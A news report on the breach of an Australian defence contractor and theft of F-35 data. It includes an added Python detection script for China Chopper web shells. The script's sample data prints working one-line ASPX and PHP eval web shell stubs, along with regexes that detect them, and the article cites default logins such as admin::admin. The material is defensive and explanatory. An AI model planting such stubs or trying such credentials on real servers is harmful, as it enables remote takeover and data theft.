Australian defense firm was hacked and Lockheed Martin F-35 Lightning data stolen, DOD confirms
The Australian Cyber Security Centre reported in its just-issued 2017 Threat Report that a small Australian defense contractor “with contracting links to national security projects” had been the victim of a cyber-espionage attack discovered last November. “ACSC analysis confirmed that the adversary had sustained access to the network for an extended period of time and had stolen a significant amount of data,” the ACSC report stated. “The adversary remained active on the network at the time.”
Details of the breach were revealed on Wednesday at an IT conference in Sydney. ASD Incident Response Manager Mitchell Clarke said, “The compromise was extensive and extreme.” The attacker behind the breach has been privately referred to at the Australian Signals Directorate as “APT Alf” (named after a character in Australia’s long-running television show Home and Away, not the US television furry alien). Alf took approximately 30 gigabytes of data, including data related to Australia’s involvement in the Lockheed Martin F-35 Joint Strike Fighter program, as well as data on the P-8 Poseidon patrol plane, proposed future Australian Navy ships, the C-130 Hercules cargo plane, and the Joint Direct Attack Munition (JDAM) bomb. The breach began in July of 2016.
A spokesperson for the US Department of Defense’s F-35 Joint Program Office confirmed the breach to Defense News, stating that the Office “is aware” of it. The spokesperson reiterated that no classified data was exposed.
The ASD was alerted to the breach by a “partner organization” in November, Clarke said. When the ACSC’s national Computer Emergency Response Team and ASD investigators arrived at the company, company representatives did not believe they were genuine because they did not carry official credentials.
Included in the stolen data was a “wire diagram” of one of the Australian Navy’s planned ships that provided a full layout of the ship’s interior, Clarke said. “You could zoom in down to the captain’s chair and see that it’s, you know, 1 meter away from the nav chair,” Clarke explained.
Defence Industry Minister Christopher Pyne said in an interview with Australian Broadcasting Corporation radio on Thursday that none of the stolen data was classified, but it was commercially sensitive and restricted under the US International Traffic in Arms Regulations (ITAR). The attacker also had full access to company e-mails.
The intrusion was carried out by “exploiting an Internet-facing server,” the ACSC reported, “then using administrative credentials to move laterally within the network, where they were able to install multiple webshells—a script that can be uploaded to a web server to enable remote administration of the machine—throughout the network to gain and maintain further access.”
The web shell used was “China Chopper,” a remote Web access tool with server-side variants for Microsoft ASPX, Adobe ColdFusion, and Java Server Pages. China Chopper, as its name suggests, has been used heavily in the past by China-based intrusion groups, although the tool is publicly available, so its presence alone is not attribution. Clarke said the attack may have been carried out by cybercriminals or a state actor. Australian officials have not made a specific attribution for the attack, and they have stated that they do not plan to share any additional details.
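China Chopper is worth hunting for precisely because its server half is so small: the whole shell is a one-line eval() of a POST parameter, and the operator's client only ever POSTs to that one script. The following is an added example (it is not code from the article, the ACSC, or the ASD) that hunts for the shell two ways: it scans web-root files for the publicly documented ASPX and PHP eval stubs, and it parses W3C-format IIS access-log lines looking for a client that does nothing but POST to a single script with no Referer, then joins the two. The file contents, the log lines, the host names, the IP addresses, and the path /helpdesk/img/ui.aspx are all constructed for the example; the log heuristic (post-only client, missing Referer, the old MSIE 6.0 User-Agent the China Chopper client has been seen to send) is an assumption a real hunt would tune to its own environment.

```python
"""Hunt for China Chopper style web shells on disk and in IIS access logs.

Added example, not from the article or the agencies it quotes. The on-disk
patterns are the public ASPX and PHP server stubs of the shell; the log
heuristic and all sample data are constructed for this example.
"""
import re
from typing import Dict, List, Tuple

# --- 1. On-disk hunt: the server half of China Chopper is one eval() call ----------
SHELL_PATTERNS = {
    # ASPX/JScript variant: eval(Request.Item["<password>"], "unsafe")
    "aspx-jscript-eval": re.compile(
        r'eval\s*\(\s*Request\.Item\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)', re.I),
    # PHP variant: @eval($_POST['<password>'])
    "php-eval-post": re.compile(
        r'@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\[\s*["\'][^"\']+["\']\s*\]\s*\)', re.I),
}


def scan_source(path: str, content: str) -> List[str]:
    """Return the names of shell patterns matched in one web-root file's text."""
    hits = [name for name, pat in SHELL_PATTERNS.items() if pat.search(content)]
    # A genuine stub is tiny. A sub-200-byte script that still calls eval() deserves
    # a look even if the parameter name or whitespace has been changed.
    if not hits and len(content) < 200 and re.search(r"\beval\s*\(", content, re.I):
        hits.append("tiny-eval-stub")
    return hits


# --- 2. Log hunt: the client only ever POSTs to the shell, with no Referer ----------
# User-Agent the China Chopper client has been observed sending (IIS logs encode spaces as '+').
CHOPPER_UA = re.compile(r"MSIE\+6\.0;\+Windows\+NT\+5\.1", re.I)


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log lines into dicts keyed by the names in the #Fields: header."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):      # skip truncated or malformed lines
                rows.append(dict(zip(fields, values)))
    return rows


def suspicious_post_targets(rows: List[Dict[str, str]]) -> Dict[Tuple[str, str], List[str]]:
    """Return {(client ip, uri-stem): reasons} for clients that only POST to one script."""
    per_client: Dict[str, List[Dict[str, str]]] = {}
    for r in rows:
        per_client.setdefault(r["c-ip"], []).append(r)
    findings: Dict[Tuple[str, str], List[str]] = {}
    for ip, reqs in per_client.items():
        stems = {r["cs-uri-stem"] for r in reqs}
        if len(stems) == 1 and all(r["cs-method"] == "POST" and r["cs(Referer)"] == "-" for r in reqs):
            reasons = ["post-only-client", "no-referer"]
            if any(CHOPPER_UA.search(r["cs(User-Agent)"]) for r in reqs):
                reasons.append("chopper-client-ua")
            findings[(ip, stems.pop())] = reasons
    return findings


def correlate(webroot: Dict[str, str], log_text: str) -> List[Tuple[str, str, List[str]]]:
    """Join disk and log findings as (path, client ip or '-', reasons), strongest first."""
    disk = {"/" + p: scan_source(p, c) for p, c in webroot.items()}
    disk = {p: h for p, h in disk.items() if h}
    net = suspicious_post_targets(parse_iis_log(log_text))
    out = [(stem, ip, disk.get(stem, []) + reasons) for (ip, stem), reasons in net.items()]
    for path, hits in disk.items():             # files with no traffic yet still get reported
        if not any(stem == path for _, stem in net):
            out.append((path, "-", hits))
    return sorted(out, key=lambda t: -len(t[2]))


# --- Constructed sample data (not real files or logs) --------------------------------
WEBROOT = {
    "helpdesk/Default.aspx": '<%@ Page Language="C#" Inherits="Helpdesk.Default" %>\n'
                             "<html><body><h1>IT Helpdesk</h1></body></html>",
    "helpdesk/img/ui.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "portal/upload/t.php": "<?php @eval($_POST['p']);?>",
}
IIS_LOG = """#Software: Microsoft Internet Information Services 8.5
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) cs(Referer) sc-status cs-bytes
2016-07-14 02:11:07 GET /helpdesk/Default.aspx - 10.1.2.33 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64) http://intranet/ 200 312
2016-07-14 02:11:22 POST /helpdesk/Login.aspx - 10.1.2.33 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64) http://intranet/helpdesk/Default.aspx 302 840
2016-07-14 02:12:40 POST /helpdesk/img/ui.aspx - 203.0.113.7 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - 200 1457
2016-07-14 02:12:41 POST /helpdesk/img/ui.aspx - 203.0.113.7 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - 200 2210
2016-07-14 02:13:05 GET /helpdesk/img/logo.png - 10.1.2.34 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64) http://intranet/helpdesk/Default.aspx 200 0
"""

if __name__ == "__main__":
    for path, ip, reasons in correlate(WEBROOT, IIS_LOG):
        print(f"{path:30} {ip:15} {', '.join(reasons)}")
```

On the sample data the helpdesk upload ui.aspx is reported with both the on-disk stub match and the log indicators, while t.php is reported from the file scan alone; an ordinary user who loads Default.aspx and then POSTs a login form with a Referer is not flagged. The post-only-client test is deliberately stricter than a per-request rule so that a busy portal does not drown the output in false positives; the trade-off is that an operator who also browses the site from the same address will slip past it, which is why the disk scan runs independently.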
The initial intrusion apparently did not take a great deal of effort, according to Clarke, who did not name the company involved but did provide some further details of the attack, as reported by ZDNet’s Australian contributor Stilgherrian. The company had one full-time IT person on staff, and that person had only been in the job for nine months. Clarke characterized the IT infrastructure at the company as “sloppy.” The attackers used a 12-month-old known vulnerability to gain access to the company’s IT Helpdesk Portal server, which was connected to file shares on an internal network server using the domain administrator’s account. That last detail explains the speed of the lateral movement the ACSC described: a web application running with domain administrator credentials turns a single server compromise into control of the whole domain, which is exactly why such services should run under dedicated, minimally privileged accounts.
“The attacker needn’t have bothered with that, however,” Stilgherrian reported. “The ASD’s investigation found that internet-facing services still had their default passwords, admin::admin and guest::guest.”